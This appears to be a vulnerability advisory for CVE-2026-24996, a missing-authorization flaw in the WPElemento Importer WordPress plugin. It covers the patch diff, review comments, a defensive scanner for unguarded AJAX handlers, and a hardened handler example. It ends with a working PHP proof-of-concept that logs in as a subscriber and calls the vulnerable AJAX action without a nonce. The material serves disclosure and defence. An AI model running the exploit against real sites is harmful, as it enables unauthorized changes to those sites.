Atomic Edge analysis of CVE-2026-24996:
The WPElemento Importer plugin for WordPress versions up to and including 0.6.4 contains a missing authorization vulnerability. The flaw resides in an AJAX-accessible function, allowing authenticated attackers with Subscriber-level permissions or higher to perform unauthorized actions. The CVSS score of 4.3 reflects a medium-severity impact.
Atomic Edge research identifies the root cause as a missing capability check and nonce verification in the `wpelemento_importer_setup_elementor` function. The vulnerable function is located in the file `wpelemento-importer/theme-wizard/elemento_exporter_whizzie.php`. Prior to the patch, the function at line 1336 began execution without validating the user’s permissions or the request’s authenticity.
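The root cause pattern described above (an AJAX callback that starts its work without a nonce check or a capability check) is easy to look for mechanically in a plugin you maintain. The following PHP script is an added example, not Atomic Edge or plugin code: it scans a source string for `wp_ajax_*` registrations, locates each callback body, and reports any callback that lacks a nonce verification call (`check_ajax_referer`, `check_admin_referer` or `wp_verify_nonce`) or a `current_user_can()` check, and any handler registered under `wp_ajax_nopriv_`. It is a heuristic (regex-based, single file, no cross-file resolution); the function names and the sample plugin source are constructed for illustration.

```php
<?php
// Added example, not Atomic Edge or plugin code: a heuristic audit that scans PHP
// plugin source for wp_ajax_* registrations whose callbacks lack a nonce check
// and a capability check. Function names and the sample source are constructed.

// Return the body between the opening brace at $pos (exclusive) and its match.
function wpaudit_brace_body(string $src, int $pos): string {
    $depth = 1;
    $len = strlen($src);
    for ($i = $pos; $i < $len; $i++) {
        if ($src[$i] === '{') {
            $depth++;
        } elseif ($src[$i] === '}' && --$depth === 0) {
            return substr($src, $pos, $i - $pos);
        }
    }
    return substr($src, $pos); // unbalanced input: audit what is there
}

// Scan one source string; returns one [action, issue] pair per missing control.
function wpaudit_scan(string $src): array {
    // Matches add_action('wp_ajax_[nopriv_]<action>', 'cb') and array($this, 'cb') forms.
    $reg = '/add_action\(\s*[\'"]wp_ajax_(nopriv_)?([A-Za-z0-9_]+)[\'"]\s*,\s*'
         . '(?:array\(\s*\$this\s*,\s*)?[\'"]([A-Za-z0-9_]+)[\'"]/';
    if (!preg_match_all($reg, $src, $hooks, PREG_SET_ORDER)) {
        return [];
    }
    $findings = [];
    foreach ($hooks as $h) {
        $nopriv   = $h[1] !== '';
        $action   = $h[2];
        $callback = $h[3];
        $def = '/function\s+' . preg_quote($callback, '/') . '\s*\([^)]*\)\s*\{/';
        if (!preg_match($def, $src, $m, PREG_OFFSET_CAPTURE)) {
            $findings[] = [$action, "callback $callback not defined in this file"];
            continue;
        }
        $body = wpaudit_brace_body($src, $m[0][1] + strlen($m[0][0]));
        $hasNonce = (bool) preg_match('/\b(check_ajax_referer|check_admin_referer|wp_verify_nonce)\s*\(/', $body);
        $hasCap   = (bool) preg_match('/\bcurrent_user_can\s*\(/', $body);
        if ($nopriv) {
            $findings[] = [$action, 'registered with wp_ajax_nopriv_: reachable without login'];
        }
        if (!$hasNonce) {
            $findings[] = [$action, 'no nonce verification in callback'];
        }
        if (!$hasCap) {
            $findings[] = [$action, 'no current_user_can() capability check in callback'];
        }
    }
    return $findings;
}

// Constructed sample: one unguarded handler and one that follows the 0.6.5 pattern.
$sample = <<<'PHP'
add_action('wp_ajax_demo_setup', 'demo_setup');
function demo_setup() {
    wp_send_json_success(get_option('demo_themes'));
}
add_action('wp_ajax_demo_setup_fixed', array($this, 'demo_setup_fixed'));
function demo_setup_fixed() {
    if (!check_ajax_referer('demo_nonce', 'wpnonce', false)) { wp_send_json_error(); }
    if (!current_user_can('manage_options')) { wp_send_json_error(); }
    wp_send_json_success(get_option('demo_themes'));
}
PHP;

foreach (wpaudit_scan($sample) as [$action, $issue]) {
    echo "[$action] $issue\n";
}
```

Run it over each PHP file of a plugin (for example by feeding `file_get_contents()` of every file under the plugin directory to `wpaudit_scan()`); the `demo_setup` handler in the sample is reported for both missing controls while `demo_setup_fixed` produces no findings. Because the scan is per file, a callback registered in one file and defined in another shows up as "not defined in this file" rather than being silently skipped.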
Exploitation occurs via a POST request to the WordPress admin AJAX endpoint, `/wp-admin/admin-ajax.php`. An attacker with a valid subscriber-level WordPress session crafts a request with the `action` parameter set to `wpelemento_importer_setup_elementor`. No nonce parameter is required in the vulnerable version. The attacker sends this request to trigger the function’s unauthorized logic.
The patch, implemented in version 0.6.5, adds two critical security checks at the start of the `wpelemento_importer_setup_elementor` function. First, it verifies the AJAX nonce using `check_ajax_referer('whizzie_nonce', 'wpnonce', false)`. Second, it confirms the user has administrative privileges with `current_user_can('manage_options')`. If either check fails, the function terminates with a JSON error response, preventing unauthorized execution.
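The two checks only work as intended when the surrounding plumbing is right: the action must be registered for logged-in users only, and the admin page that issues the request must be given a nonce created for the same action name so that it can send it as `wpnonce`. The following PHP is an added example, not the plugin's code, showing the complete hardened pattern that the 0.6.5 patch applies; the class name, the admin page hook suffix, the script handle and the response payload are assumptions, while the nonce action `whizzie_nonce`, the query argument `wpnonce` and the `manage_options` capability are the values used by the patch.

```php
<?php
// Added example, not the plugin's code: the hardened AJAX pattern from the 0.6.5
// patch together with the hook registration and nonce provisioning it relies on.
// Class name, admin page hook suffix and script handle are assumptions.

class Example_Importer_Ajax {
    const NONCE_ACTION = 'whizzie_nonce';                      // nonce action from the patch
    const AJAX_ACTION  = 'wpelemento_importer_setup_elementor'; // action from the patch

    public function __construct() {
        // Only the logged-in variant is registered. There is deliberately no
        // wp_ajax_nopriv_ hook, so unauthenticated requests never reach the handler.
        add_action('wp_ajax_' . self::AJAX_ACTION, array($this, 'setup_elementor'));
        add_action('admin_enqueue_scripts', array($this, 'enqueue_assets'));
    }

    // Hand the nonce to the admin page script that issues the request. The client
    // then POSTs action=<AJAX_ACTION> and wpnonce=<nonce> to admin-ajax.php.
    public function enqueue_assets($hook_suffix) {
        if ($hook_suffix !== 'appearance_page_example-importer') { // assumed page hook
            return;
        }
        wp_enqueue_script('example-importer', plugins_url('importer.js', __FILE__), array('jquery'), '1.0', true);
        wp_localize_script('example-importer', 'exampleImporter', array(
            'ajaxUrl' => admin_url('admin-ajax.php'),
            'wpnonce' => wp_create_nonce(self::NONCE_ACTION),
        ));
    }

    public function setup_elementor() {
        // 1. Request authenticity: the nonce is bound to this user's session and
        //    to NONCE_ACTION, so a request forged from another origin fails here.
        //    $die = false makes check_ajax_referer() return false instead of dying,
        //    which lets us answer with a structured JSON error.
        if (!check_ajax_referer(self::NONCE_ACTION, 'wpnonce', false)) {
            wp_send_json_error(array('message' => 'Nonce verification failed'), 403);
        }
        // 2. Authorization: a valid session is not enough; a subscriber has a
        //    session too. Require the capability the operation actually needs.
        if (!current_user_can('manage_options')) {
            wp_send_json_error(array('message' => 'Administrator access required.'), 403);
        }
        // Both guards passed (wp_send_json_error() ends the request via wp_die(),
        // so execution only reaches this point when both checks succeeded).
        $result = array('status' => 'elementor setup started'); // placeholder payload
        wp_send_json_success($result);
    }
}

new Example_Importer_Ajax();
```

The order of the guards is deliberate: the nonce check runs first so that a forged request is rejected before any user lookup, and the capability check then enforces that "logged in" does not mean "authorized". Keeping the request method to POST via the client script and avoiding a `wp_ajax_nopriv_` registration removes the two remaining ways a handler like this tends to be reachable by the wrong caller.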
Successful exploitation allows an attacker with minimal privileges to perform the action intended only for administrators. While the exact impact of the `wpelemento_importer_setup_elementor` function is not detailed in the diff, such unauthorized access in an importer plugin could lead to unintended theme or demo data changes, site configuration modification, or data exposure depending on the function’s internal logic.
--- a/wpelemento-importer/plugin.php
+++ b/wpelemento-importer/plugin.php
@@ -3,7 +3,7 @@
Plugin Name: WPElemento Importer
Plugin URI:
Description: Effortlessly set up WordPress themes with WPelemento Importer. One-click demo imports, Elementor compatibility, and support for diverse themes.
- Version: 0.6.4
+ Version: 0.6.5
Requires at least: 5.2
Requires PHP: 7.2
Author: wpelemento
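Review bot: Version bump only, but the plugin's readme.txt stable tag and changelog entry for 0.6.5 are not part of this diff; confirm they are updated alongside `Version: 0.6.5` so the update is actually offered to installed sites.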
--- a/wpelemento-importer/theme-wizard/elemento_exporter_whizzie.php
+++ b/wpelemento-importer/theme-wizard/elemento_exporter_whizzie.php
@@ -1336,6 +1336,14 @@
}
// this code is for demo elementor importer start //
function wpelemento_importer_setup_elementor() {
+
+ if (!check_ajax_referer('whizzie_nonce', 'wpnonce', false)) {
+ wp_send_json_error(array('message' => esc_html__('Nonce verification failed', 'wpelemento-importer')));
+ }
+
+ if (!current_user_can('manage_options')) {
+ wp_send_json_error(array('message' => esc_html__('Insufficient permissions. Administrator access required.', 'wpelemento-importer')));
+ }
$elemento_themes = $this->get_elemento_themes();
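Review bot: Both guards are correct as written and in the right order, and since `wp_send_json_error()` ends the request via `wp_die()` the fall-through into `$this->get_elemento_themes()` is only reached when both pass; what this hunk does not show is the caller side, which must now populate the `wpnonce` field from `wp_create_nonce('whizzie_nonce')` on the admin page that issues this request, otherwise every legitimate import fails the first check. Also worth confirming outside this hunk: the action should be registered under `wp_ajax_` only, with no `wp_ajax_nopriv_` registration, so that unauthenticated requests are dropped before the handler rather than relying on the capability check alone.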
<?php
// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept
// CVE-2026-24996 - WPElemento Importer <= 0.6.4 - Missing Authorization
// Configuration
$target_url = 'https://vulnerable-site.com'; // Set target WordPress site URL
$username = 'subscriber'; // Attacker's subscriber username
$password = 'password'; // Attacker's subscriber password
// Initialize cURL session for WordPress login to obtain authentication cookies
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $target_url . '/wp-login.php');
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query(array(
'log' => $username,
'pwd' => $password,
'wp-submit' => 'Log In',
'redirect_to' => $target_url . '/wp-admin/',
'testcookie' => '1'
)));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_COOKIEJAR, 'cookies.txt'); // Save session cookies
curl_setopt($ch, CURLOPT_COOKIEFILE, 'cookies.txt');
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
$login_response = curl_exec($ch);
// Check if login likely succeeded by attempting to access the AJAX endpoint with the vulnerable action
curl_setopt($ch, CURLOPT_URL, $target_url . '/wp-admin/admin-ajax.php');
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query(array(
'action' => 'wpelemento_importer_setup_elementor'
// No 'wpnonce' parameter required for exploitation in versions <= 0.6.4
)));
$ajax_response = curl_exec($ch);
curl_close($ch);
// Output the server's response
echo "Target: $target_url\n";
echo "Action: wpelemento_importer_setup_elementor\n";
echo "Response:\n";
print_r($ajax_response);
?>